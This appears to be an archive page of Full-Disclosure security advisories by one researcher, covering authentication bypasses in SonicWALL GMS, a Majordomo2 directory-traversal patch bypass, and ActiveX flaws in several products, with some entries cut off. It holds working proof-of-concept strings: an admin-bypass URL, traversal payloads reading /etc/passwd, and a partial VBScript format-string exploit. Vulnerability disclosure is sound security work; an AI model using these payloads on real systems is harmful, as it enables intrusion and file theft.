[Full-disclosure] NSOADV-2013-001: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)
__ -- NSOADV-2013-001 --- SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/) __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/) Severity: Critical CVE-ID: CVE-2013-1359 CVSS Base Score:10 Impact:10 Exploitability:10 CVSS2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C Advisory ID:NSOADV-2013-001 Found Date: 2012-04-26 Date Reported: 2012-12-13 Release Date: 2013-01-17 Author: Nikolas Sotiriu Website:http://sotiriu.de Twitter:http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2013-001.txt Vendor: DELL SonicWALL (http://www.sonicwall.com/) Affected Products: GMS Analyzer UMA ViewPoint Affected Platforms: Windows/Linux Affected Versions: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x Remote Exploitable: Yes Local Exploitable: No Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Background: === The SonicWALL® Global Management System (GMS) provides organizations, distributed enterprises and service providers with a powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware, or a virtual appliance, SonicWALL GMS offers centralized real-time monitoring, and comprehensive policy and compliance reporting. For enterprise customers, SonicWALL GMS streamlines security policy management and appliance deployment, minimizing administration overhead. Service Providers can use GMS to simplify the security management of multiple clients and create additional revenue opportunities. For added redundancy and scalability, GMS can be deployed in a cluster configuration. (Product description from Website) Description: DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that allows an unauthenticated, remote attacker to bypass the Web interface authentication offered by the affected product. The vulnerability is attributed to a built-in function to skip the session check of the web application. An attacker may exploit this vulnerability by sending a request to the UMA Interface (/appliance/) with the parameter skipSessionCheck=1. The attacker gains full administrative access to the interface and could execute code with root or SYSTEM permissions, which leads to a full compromisation of the system. Proof of Concept: = http://host/appliance/applianceMainPage?action=statusskipSessionCheck=1 The remote Root/System exploit
[Full-disclosure] NSOADV-2013-002: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)
__ -- NSOADV-2013-002 --- SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) Severity: Critical CVE-ID: CVE-2013-1360 CVSS Base Score:9 Impact:8.5 Exploitability:10 CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C Advisory ID:NSOADV-2013-002 Found Date: 2012-04-26 Date Reported: 2012-12-13 Release Date: 2013-01-17 Author: Nikolas Sotiriu Website:http://sotiriu.de Twitter:http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2013-002.txt Vendor: DELL SonicWALL (http://www.sonicwall.com/) Affected Products: GMS Analyzer UMA ViewPoint Affected Platforms: Windows/Linux Affected Versions: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x Remote Exploitable: Yes Local Exploitable: No Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Background: === The SonicWALL® Global Management System (GMS) provides organizations, distributed enterprises and service providers with a powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware, or a virtual appliance, SonicWALL GMS offers centralized real-time monitoring, and comprehensive policy and compliance reporting. For enterprise customers, SonicWALL GMS streamlines security policy management and appliance deployment, minimizing administration overhead. Service Providers can use GMS to simplify the security management of multiple clients and create additional revenue opportunities. For added redundancy and scalability, GMS can be deployed in a cluster configuration. (Product description from Website) Description: DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that allows an unauthenticated, remote attacker to bypass the Web interface authentication offered by the affected product. The vulnerability is attributed to a broken session handling in the process of password change process of the web application. changing in the web application. An attacker may exploit this vulnerability by sending a specially crafted request to the SGMS Interface (/sgms/). The attacker gains full administrative access to the interface and full control over all managed appliances, which could lead to a full compromisation of the organisation. Proof of Concept : == Access the following URL to login to the sgms interface: http://host/sgms/auth
[Full-disclosure] NSOADV-2011-003: Majordomo2 'help' Command Directory Traversal (Patch Bypass)
__ -- NSOADV-2011-003 --- Majordomo2 'help' Command Directory Traversal (Patch Bypass) __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: Majordomo2 'help' Command Directory Traversal Severity: Medium Advisory ID:NSOADV-2011-003 CVE:CVE-2011-0063 Found Date: 03.02.2011 Date Reported: 03.02.2011 Release Date: 19.02.2011 Author: Nikolas Sotiriu Mail: nso-research at sotiriu.de Website:http://sotiriu.de/ Twitter:http://twitter.com/nsoresearch Advisory-URL: http://sotiriu.de/adv/NSOADV-2011-003.txt Vendor/Project: http://www.mj2.org/ Affected Products: majordomo2 = 20110203 Remote Exploitable: Yes Local Exploitable: No Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === Majordomo 2 is an upwardly-compatible rewrite of the popular majordomo mailing list manager software by Jason Tibbitts and Michael Yount. Description: Majordomo2 = 20110203 is affected by a Directory Traversal vulnerability due to parameter 'extra' of the 'help' command in the function '_list_file_get()' is not properly sanitized. The original bug was made public on 03.02.2011 by Michael Brooks of sitewat.ch: https://sitewat.ch/en/Advisory/View/1 https://bugzilla.mozilla.org/show_bug.cgi?id=628064 I discovered, that the patch, which is in the CVS since version 20110125 don't protect against the Directory Traversal bug. https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 The diff build in the regex '$file =~ s!/?\.\./?!!g;', which deletes '../' from $file. Bypassing this regex is quiet simple by using './.../' insted '../'. Proof of Concept : == HTTP: http://target/cgi-bin/mj_wwwusr?passw=list=GLOBALuser=func=help extra=./..././..././..././..././..././..././..././.../etc/passwd SMTP: help ./..././..././..././..././..././..././..././.../etc/passwd Solution: = Update to Majordomo2 = 20110204 http://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz References: === Sitewatch Advisory: https://sitewat.ch/en/Advisory/View/1 Original Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=628064 Patch Bypass: https://bugzilla.mozilla.org/show_bug.cgi?id=631307 Disclosure Timeline (/MM/DD): = 2011.02.03: Patch bypass vulnerability found 2011.02.03: Informed security [at] mozilla.org 2011.02.03: Mozilla opend Bug 631307 in bugzilla 2011.02.03: Jason Tibbitts comitted a fix (Sorry again) 2011.02.04: Snapshot available for download 2011.02.04: Discuss the public disclosure 2011.03.04: Got the Bug Bounty Money 2011.03.08: Release of Advisory ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure
[Full-disclosure] NSOADV-2010-005: SonicWALL E-Class SSL-VPN ActiveX Control format string overflow
__ -- NSOADV-2010-005 --- SonicWALL E-Class SSL-VPN ActiveX Control format string overflow __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: SonicWALL E-Class SSL-VPN ActiveX Control format string overflow Severity: High Advisory ID:NSOADV-2010-005 Found Date: 22.02.2010 Date Reported: 09.06.2010 Release Date: 19.08.2010 Author: Nikolas Sotiriu Website:http://sotiriu.de Twitter:http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2009-005.txt Vendor: SonicWALL (http://www.sonicwall.com/) Affected Products: SonicWALL SRA EX1600 SonicWALL EX7000 SonicWALL EX6000 SonicWALL EX-1600 SonicWALL EX-1500 SonicWALL EX-750 Affected Versions: 10.0.4 and all previous versions 10.5.1 without hotfix Remote Exploitable: Yes Local Exploitable: No Patch Status: Vendor released a patch Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === SonicWALL has added the award-winning Aventail SSL VPN product line to our E-Class SRA appliances. Aventail's best-of-breed SSL VPNs deliver secure remote access to the most resources from the most end point locations. Aventail was named in the Visionaries Quadrant in the SSL VPN Magic Quadrant Report from Gartner, considered to be the leading analyst firm covering the SSL VPN industry. (Product description from Website) Description: Remote exploitation of a format string overflow vulnerability in the End-Point Interrogator/Installer ActiveX Control could allow an attacker to execute arbitrary code within the security context of the targeted user. The affected function is AuthCredential. The functions ConfigurationString seems to be also vulnerable, but the format string has to be base64 decoded. Name: End-Point Interrogator/Installer Module Vendor: Aventail Corporation Type: ActiveX-Control Version: 10.3.42 Prog ID: EPILib.EPInterrogator GUID: {2A1BE1E7-C550-4D67-A553-7F2D3A39233D} File: epi.dll Folder: %userprofile%\Application Data\Aventail\epi Safe for Script: True Safe for Init:True Proof of Concept : == html head titleSonicWALL E-Class SSL-VPN ActiveX Control DoS PoC/title /head body pre img src=http://sotiriu.de/images/logo_wh_80.png; input type=button name=Submit VALUE=Rule #5 – Shoot First /pre object classid='clsid:2A1BE1E7-C550-4D67-A553-7F2D3A39233D' id='obj'/object script language='vbscript' Sub Submit_OnClick eax=String(2, unescape(%u6161)) arg=%1862x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n
[Full-disclosure] NSOADV-2010-008: AnNoText Third-Party ActiveX Control Buffer Overflow
__ -- NSOADV-2010-008 --- AnNoText Third-Party ActiveX Control Buffer Overflow __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: AnNoText Third-Party ActiveX Control Buffer Overflow Severity: Critical Advisory ID:NSOADV-2010-008 Found Date: 18.03.2010 Date Reported: 25.03.2010 Release Date: 11.06.2010 Author: Nikolas Sotiriu Mail: nso-research at sotiriu.de Website:http://sotiriu.de/ Twitter:http://twitter.com/nsoresearch Advisory-URL: http://sotiriu.de/adv/NSOADV-2010-008.txt Vendor: AnNoText (http://www.annotext.de/) Affected Products: ADVOAkte 17 Build 4.8.0.116 Patchlevel 034 Affected Component: KEYHELPLib ActiveX Control V.1.1.2200.0 Remote Exploitable: Yes Local Exploitable: No Patch Status: unknown (No response from vendor) Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === AnNoText is a German Company, which makes Software for lawyers. Description: During the installation of the ADVOAkte an ActiveX Control will be installed (keyhelp.ocx), in which multiple functions are vulnerable to a buffer oveflow bugs, which could lead to a remote code execution. Registered Classes: +-- Name: KeyPopup Class Vendor: KeyWorks Software Type: ActiveX-Control Version: 1.1.2200.0 GUID: {1E57C6C4-B069-11D3-8D43-00104B138C8C} File: keyhelp.ocx Folder: C:\WINDOWS\system32\ Safe for Script: True Safe for Init:False Name: KeyScript Class Vendor: KeyWorks Software Type: ActiveX-Control Version: 1.1.2200.0 GUID: {45E66957-2932-432A-A156-31503DF0A681} File: keyhelp.ocx Folder: C:\WINDOWS\system32\ Safe for Script: True Safe for Init:False Name: KeyHelp Embedded Window Vendor: KeyWorks Software Type: ActiveX-Control Version: 1.1.2200.0 GUID: {B7ECFD41-BE62-11D2-B9A8-00104B138C8C} File: keyhelp.ocx Folder: C:\WINDOWS\system32\ Safe for Script: True Safe for Init:True Proof of Concept : == http://sotiriu.de/software/NSOPOC-2010-008.zip (coming soon) Solution: = Disable the vulnerable ActiveX Control by setting the kill bit for the following CLSID: {1E57C6C4-B069-11D3-8D43-00104B138C8C} {45E66957-2932-432A-A156-31503DF0A681} {B7ECFD41-BE62-11D2-B9A8-00104B138C8C} Save the following text as a .REG file and imported to set the kill bit for this controls: +-- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1E57C6C4-B069-11D3-8D43-00104B138C8C}] Compatibility Flags=dword:0400
[Full-disclosure] NSOADV-2010-009: AnNoText Third-Party ActiveX Control file overwrite vulnerability
__ -- NSOADV-2010-009 --- AnNoText Third-Party ActiveX Control file overwrite vulnerability __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: AnNoText Third-Party ActiveX Control file overwrite vulnerability Severity: Low Advisory ID:NSOADV-2010-009 Found Date: 18.03.2010 Date Reported: 25.03.2010 Release Date: 11.06.2010 Author: Nikolas Sotiriu Mail: nso-research at sotiriu.de Website:http://sotiriu.de/ Twitter:http://twitter.com/nsoresearch Advisory-URL: http://sotiriu.de/adv/NSOADV-2010-009.txt Vendor: AnNoText (http://www.annotext.de/) Affected Products: ADVOMahn Edition 21 Affected Components IDAutomation Linear BarCode V.1.6.0.6 IDautomation PDF417 Barcode V.1.6.0.6 Remote Exploitable: Yes Local Exploitable: No Patch Status: unknown (No response from vendor) Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === AnNoText is a German Company, which makes Software for lawyers. Description: During the installation of the ADVOMahn two ActiveX Control will be installed (IDAutomationLinear6.dll and IDAutomationPDF417_6.dll), in which the functions SaveBarCode and SaveEnhWMF can lead to a file overwrite bug. Controls: + Name: IDAutomation Linear BarCode 1.606 Vendor: IDAutomation.com Inc. Type: ActiveX-Control Version: 1.6.0.6 GUID: {0C3874AA-AB39-4B5E-A768-45F3CE6C6819} File: IDAutomationLinear6.dll Folder: C:\WINDOWS\system32\ Safe for Script: True Safe for Init:True Name: IDautomation PDF417 Barcode Vendor: IDAutomation.com Inc. Type: ActiveX-Control Version: 1.6.0.6 GUID: {E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0} File: IDAutomationPDF417_6.dll Folder: C:\WINDOWS\system32\ Safe for Script: True Safe for Init:True Proof of Concept : == http://sotiriu.de/software/NSOPOC-2010-009.zip (coming soon) Solution: = Disable the vulnerable ActiveX Control by setting the kill bit for the following CLSID: {0C3874AA-AB39-4B5E-A768-45F3CE6C6819} {E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0} Save the following text as a .REG file and imported to set the kill bit for this controls: +-- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0C3874AA-AB39-4B5E-A768-45F3CE6C6819}] Compatibility Flags=dword:0400 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0}] Compatibility Flags=dword:0400 +-- More information about how to set the kill bit is available
[Full-disclosure] Security contact SonicWALL
Anybody knows the security contact for SonicWALL? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NSOADV-2010-006: Authentium Command Free Scan ActiveX Control buffer overflow
__ -- NSOADV-2010-006 --- Authentium Command Free Scan ActiveX Control buffer overflow __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: Authentium Command On Demand ActiveX Control Buffer Overflow Severity: High Advisory ID:NSOADV-2010-006 Found Date: 15.02.2010 Date Reported: 22.02.2010 Release Date: 04.03.2010 Author: Nikolas Sotiriu Website:http://sotiriu.de Twitter:http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2009-006.txt Vendor: Authentium (http://www.authentium.com/) Affected Products: Authentium Command On Demand Online Scan (http://www.commandondemand.com/) Affected Component: CSS Web Installer ActiveX V.1.4.9508.605 Remote Exploitable: Yes Local Exploitable: No Patch Status: No Patch (See Solution) Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === Authentium Command On Demand is a highly-effective, totally free virus scanner. Command on Demand scans for more than half a million Internet threats, using definition files that are updated daily (Product description from Website) Description: Remote exploitation of a buffer overflow vulnerability in Authentium Command On Demand Online scanner service could allow an attacker to execute arbitrary code within the security context of the targeted user. The affected function is InstallProduct1. The functions InstallProduct and InstallProduct2 seems to be also vulnerable. Name: CSS Web Installer Class Vendor: Authentium, Inc. Type: ActiveX-Control Version: 1.4.9508.605 Prog ID: CSSWEBLib.Installer GUID: {6CCE3920-3183-4B3D-808A-B12EB769DE12} File: cssweb.dll Folder: C:\WINDOWS\Downloaded Program Files\ Safe for Script: True Safe for Init:True IObjectSafety:False Proof of Concept : == http://sotiriu.de/software/NSOPOC-2010-006.zip Solution: = Product is no longer supported. Disable the vulnerable ActiveX Control by setting the kill bit for the following CLSID: {6CCE3920-3183-4B3D-808A-B12EB769DE12} Save the following text as a .REG file and imported to set the kill bit for this control: +-- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6CCE3920-3183-4B3D-808A-B12EB769DE12}] Compatibility Flags=dword:0400 +-- More information about how to set the kill bit is available in Microsoft Support Document 240797 (http://support.microsoft.com/kb/240797). Disclosure Timeline (/MM/DD): = 2010.02.15: Vulnerability found 2010.02.22
[Full-disclosure] NSOADV-2010-004: McAfee LinuxShield remote/local code execution
__ NSOADV-2010-004: McAfee LinuxShield remote/local code execution __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: McAfee LinuxShield remote/local code execution Severity: Medium Advisory ID:NSOADV-2010-004 Found Date: 07.12.2009 Date Reported: 05.02.2010 Release Date: 02.03.2010 Author: Nikolas Sotiriu (lofi) Website:http://sotiriu.de Twitter:http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2010-004.txt Vendor: McAfee (http://www.mcafee.com/) Affected Products: McAfee LinuxShield = 1.5.1 Not Affected Products: McAfee LinuxShield 1.5.1 with HF550192 Remote Exploitable: Yes (attacker must be authenticated) Local Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Thanks to: Thierry Zoller: For the permission to use his Policy Background: === LinuxShield detects and removes viruses and other potentially unwanted software on Linux-based systems. LinuxShield uses the powerful McAfee scanning engine — the engine common to all our anti-virus products. Although a few years ago, the Linux operating system was considered a secure environment, it is now seeing more occurrences of software specifically written to attack or exploit security weaknesses in Linux-based systems. Increasingly, Linux-based systems interact with Windows-based computers. Although viruses written to attack Windows- based systems do not directly attack Linux systems, a Linux server can harbor these viruses, ready to infect any client that connects to it. When installed on your Linux systems, LinuxShield provides protection against viruses, Trojan horses, and other types of potentially unwanted software. LinuxShield scans files as they are opened and closed — a technique known as on-access scanning. LinuxShield also incorporates an on-demand scanner that enables you to scan any directory or file in your host at any time. When kept up-to-date with the latest virus-definition (DAT) files, LinuxShield is an important part of your network security. We recommend that you set up an anti-virus security policy for your network, incorporating as many protective measures as possible. LinuxShield uses a web-browser interface, and a large number of LinuxShield installations can be centrally controlled by ePolicy Orchestrator. (Product description from LinuxShield Product Guide) Description: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of McAfee LinuxShield. User interaction is not required to exploit this vulnerability but an attacker must be authenticated. The LinuxShield Webinterface communicates with the localy installed nailsd daemon, which listens on port 65443/tcp, to do configuration changes, query the configuration and execute tasks. Each user, which can login to the victim box, can also authenticate it self
[Full-disclosure] NSOADV-2010-003: DATEV ActiveX Control remote command execution
__ NSOADV-2010-003: DATEV ActiveX Control remote command execution __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: DATEV DVBSExeCall ActiveX Control remote command execution Severity: Critical Advisory ID:NSOADV-2010-003 CVE Number: CVE-2010-0689 Found Date: 11.01.2010 Date Reported: 28.01.2010 Release Date: 25.02.2010 Author: Nikolas Sotiriu Mail: nso-research at sotiriu.de Website:http://sotiriu.de/ Twitter:http://twitter.com/nsoresearch Advisory-URL: http://sotiriu.de/adv/NSOADV-2010-003.txt Vendor: DATEV (http://www.datev.de/) Affected Products: DATEV Base System (Grundpaket Basis) Affected Component: DVBSExeCall Control ActiveX Control V.1.0.0.1 Remote Exploitable: Yes Local Exploitable: No Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === DATEV eG is a German Company, which makes Software for tax advisors and lawyers. The affected Base System has to be installed on all systems that need DATEV Software. Description: During the installation of the DATEV Base System (Grundpaket Basis) an ActiveX Control will be installed (DVBSExeCall.ocx), in which the function ExecuteExe is vulnerable to a command execution bug. Name: ActiveX-Control zum Öffnen von LEXinform und der InfoDB Vendor: DATEV eG Type: ActiveX-Steuerelement Version: 1.0.0.1 GUID: {C1CF8B56-3147-41A2-B9BF-79437EED7AFC} File: DVBSExeCall.ocx Folder: C:\DATEV\PROGRAMM\HLPDVBS\ Safe for Script: True Safe for Init:True IObjectSafety:False NOTE: The affected ActiveX Control will be installed by any DATEV Software, so each system with a DATEV installation is vulnerable. Proof of Concept : == Weaponized PoC demonstration video: +-- http://sotiriu.de/demos/videos/nso-2010-003.html Solution: = DATEV Advisory +- http://www.datev.de/info-db/1080162 (German) Service-Release Paket V. 1.0 +--- http://www.datev.de/portal/ShowPage.do?pid=dpinid=96550 Disclosure Timeline (/MM/DD): = 2010.01.11: Vulnerability found 2010.01.25: Initial contact per Online forms 2010.01.26: Initial vendor response 2010.01.26: Ask for a PGP Key and send the Disclosure Policy to vendor. [-] No Response 2010.01.28: Ask if vendor received my last email. 2010.01.28: Vendor is unable to use PGP. 2010.01.28: Sent PoC, Advisory, Disclosure policy and planned disclosure date (2010.02.11) to Vendor 2010.01.29: Vendor acknowledges the reception of the advisory and start to develop a patch. 2010.02.02: Patch is finished. Vendor wishes to delay the release
[Full-disclosure] [UPDATE] NSOADV-2010-001: Panda Security Local Privilege Escalation
__ Security Advisory NSOADV-2010-001 (Version 2) __ __ Title: Panda Security Local Privilege Escalation Severity: Medium Advisory ID:NSOADV-2010-001 Found Date: 02.2008 Date Reported: 30.11.2009 Release Date: 09.01.2010 Update Date:20.01.2010 Author: Nikolas Sotiriu (lofi) Website:http://sotiriu.de Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2010-001.txt Vendor: Panda Security (http://www.pandasecurity.com/) Affected Products: (Self tested) -Panda Security for Business 4.04.10 -Panda Security for Business with Exchange 4.04.10 -Panda Security for Enterprise 4.04.10 -Panda Internet Security 2010 (15.01.00) -Panda Global Protection 2010 (3.01.00) -Panda Antivirus Pro 2010 (9.01.00) -Panda Antivirus for Netbooks (9.01.00) (Provided by Panda) -Panda Global Protection 2009 -Panda Internet Security 2009 -Panda Antivirus Pro 2009 -Panda Internet Security 2008 -Panda Antivirus + Firewall 2008 -Panda Platinum 2007 Internet Security -Panda Platinum 2006 Internet Security Affected Component: Corporate Products: -Panda Security for Desktops 4.05.10 -Panda Security for File Servers 8.04.10 Remote Exploitable: No Local Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: 